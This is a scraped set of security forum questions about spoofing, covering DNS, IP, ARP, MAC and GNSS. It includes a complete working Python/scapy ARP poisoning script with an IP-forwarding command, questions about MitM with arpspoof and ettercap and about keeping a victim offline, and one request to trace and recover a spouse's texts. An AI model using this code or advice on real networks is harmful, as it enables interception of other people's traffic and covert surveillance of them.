What are the correct network settings for VirtualBox VMs to allow DNS spoofing attack [on hold]

I need to implement DNS spoofing attack usign VMs. My host network is connected to a Wireless network.

I created one Kali Linux machine (the attacker machine) and another Win10 machine (the victim machine).

I need the victim machine to be able to connect to the Internet as well as be reachable to the attacker.

Can any one help me please on the right network configurations to enable this attack?

The attacker needs the Default Gateway and the victim’s IP. How to get the DG address?

If I setup the VMs network settings as NAT, the ettercap can not see them when I sniff the newtork.

If I set up my VMs with host-only network settings, they see each other but they are in a different subnet than the actual Gateway and hence can not connect to the Internet.

Can you please provide the correct network settings to implement DNS spoofing in VMs environment and a host device connected to Wireless network?

Virtual SIM text spoofing

I recently caught my wife cheating with a co-worker and exchanging multiple text messages (over 3,000 in one month) to a specific number. After I confronted her, I don’t see the number coming up any more, however, a new suspicious number has appeared. When I try calling this number I get a message that the number is “not in service”. If I do a reverse number look-up there is no user information for this number (630-793-6074). The previous number was 630-540-6964. Is there any way to find out if these numbers are linked to the same sender? P.S. is there any way to recover the content of these texts?

Can telnet session be compromised via IP spoofing? [duplicate]

This question already has an answer here:

  • How does IP address spoofing on the Internet work? Who can do it? 4 answers

The scenario is following:

  1. A telnet server which has ACL implemented for telnet connections.
  2. A hacker spoofs IP and tries to connect to the telnet server.

Consider that the hacker knows the password. Will he/she be able to spoof the IP and establish a telnet connection over the internet successfully?

What will be the outcome the actual IP holder is active when the hacker is performing this attack?

Would like to know that what will be the case on every layer of OSI model in any possible outcome.

Not able to load website after ARP Spoofing

I have created ARP Spoofing program using python + scapy. When I run this script with target IP and Gateway IP, I was able to poison the victim’s ARP table. But I cannot load any website on the victim’s computer. I have Forwarded IP in attacker computer,

echo 1 > /proc/sys/net/ipv4/ip_forward 

I used Wireshark too to see any incoming data, but no luck.

Attacker Computer – I am Using Ubuntu 19.04 as an attacker Computer.

Victim Computer – I have created a Virtual Machine (Windows 10) on my attacker Computer, with a bridged network.

Below is the code I am using for ARP Spoofing.

import scapy.all as scapy import time import optparse import sys  def get_arguments():     parser = optparse.OptionParser()     parser.add_option("-t","--target",dest="target",help="Target IP/ Ip Range.")     parser.add_option("-g","--gateway",dest="gateway",help="Gateway IP.")     (options,arguments) = parser.parse_args()     return options  def get_mac(ip):     arp_request = scapy.ARP(pdst = ip)     broadcast =  scapy.Ether(dst="ff:ff:ff:ff:ff:ff")     arp_request_broadcast = broadcast/arp_request     answered_list = scapy.srp(arp_request_broadcast, timeout=1,verbose=False)[0]     return answered_list[0][1].hwsrc  def spoof(target_ip, spoof_ip):     target_mac = get_mac(target_ip)     package = scapy.ARP(op=2,pdst=target_ip,hwdst=target_mac,psrc=spoof_ip)     scapy.send(package,verbose=False)  def restore(destination_ip, source_ip):     destination_mac = get_mac(destination_ip)     source_mac = get_mac(source_ip)     package = scapy.ARP(op=2,pdst=destination_ip,hwdst=destination_mac,psrc=source_ip,hwsrc=source_mac)     scapy.send(package,verbose=False, count=4)  options = get_arguments() target_ip = options.target gateway_ip = options.gateway  if(target_ip == None or gateway_ip==None):     print("[-] Use --help for more information.")     sys.exit()  try:     packet_send_count = 0     while True:         spoof(target_ip,gateway_ip)         spoof(gateway_ip,target_ip)         packet_send_count += 2         print("\r[+] Packet Send : " + str(packet_send_count),end="")         time.sleep(1)  except KeyboardInterrupt:     print("\n\r[-] Quitting.... Restoring ARP Tables---")     restore(target_ip,gateway_ip)     restore(gateway_ip,target_ip) 

Alternative driver for Intel Wireless-AC 3165 to allow mac spoofing

Intel has stopped supporting mac spoofing in their wifi drivers. Are there any open source drivers that allow mac spoofing on Intel Wireless-AC 3165?

Ubuntu 18.04.1 description: Wireless interface        product: Wireless 3165        vendor: Intel Corporation        physical id: 0        bus info: pci@0000:05:00.0        logical name: wlp5s0        version: 79        serial: 08:d4:0c:73:21:3e        width: 64 bits        clock: 33MHz        capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless        configuration: broadcast=yes driver=iwlwifi driverversion=4.18.0-21-generic firmware=29.1044073957.0 ip= latency=0 link=yes multicast=yes wireless=IEEE 802.11 

arp spoofing – arpspoof vs ettercap

I would like to perform a MiTM attack on my LAN and redirect all the traffic transmitted to my gateway.

I’ve got the goal using arpspoof tool of Kali but I am not able to do the same thing using Ettercap.

What I do with arpspoof : (wired)

arpspoof -i eth0  

I’ve tried the same thing selecting only one target (the gateway) in the Ettercap’s hosts list, but that doesn’t work well. My windows machine gives me the correct MAC address into the ARP table (arp -a)

What could cause this issue?

MAC Spoofing – Keep victim out

I have successfully done a MAC Spoofing Attack on my open (ad-hoc) network using the macchanger tool (OS: Kali linux).

I would like to know what are the common techniques to keep the connection alive (so, the way to keep the machine with the real mac out of the network) because, when I try to reconnect using the victim’s machine (Windows 10), the Windows machine obviously kicks out my Kali host from the network.

How can GNSS spoofing be so easy? Don’t the satellites sign their messages?

BBC News reports that a new study accuses Russia of massive GPS spoofing (see also this linked blog article). I am surprised that this is so easy¹, in particular since GPS originates as a military system. Couldn’t such spoofing be quite simply prevented by signing each message with a private key? Has this been done and have those keys been stolen? Or is there some (fundamental?) reason why such a protection is not feasible for GNSS?

I would expect that if this were simple, it would be done. Why isn’t it?

¹Russia is also able to pull off feats that are not easy, but I’ve been told that this particular one happens to be quite easy.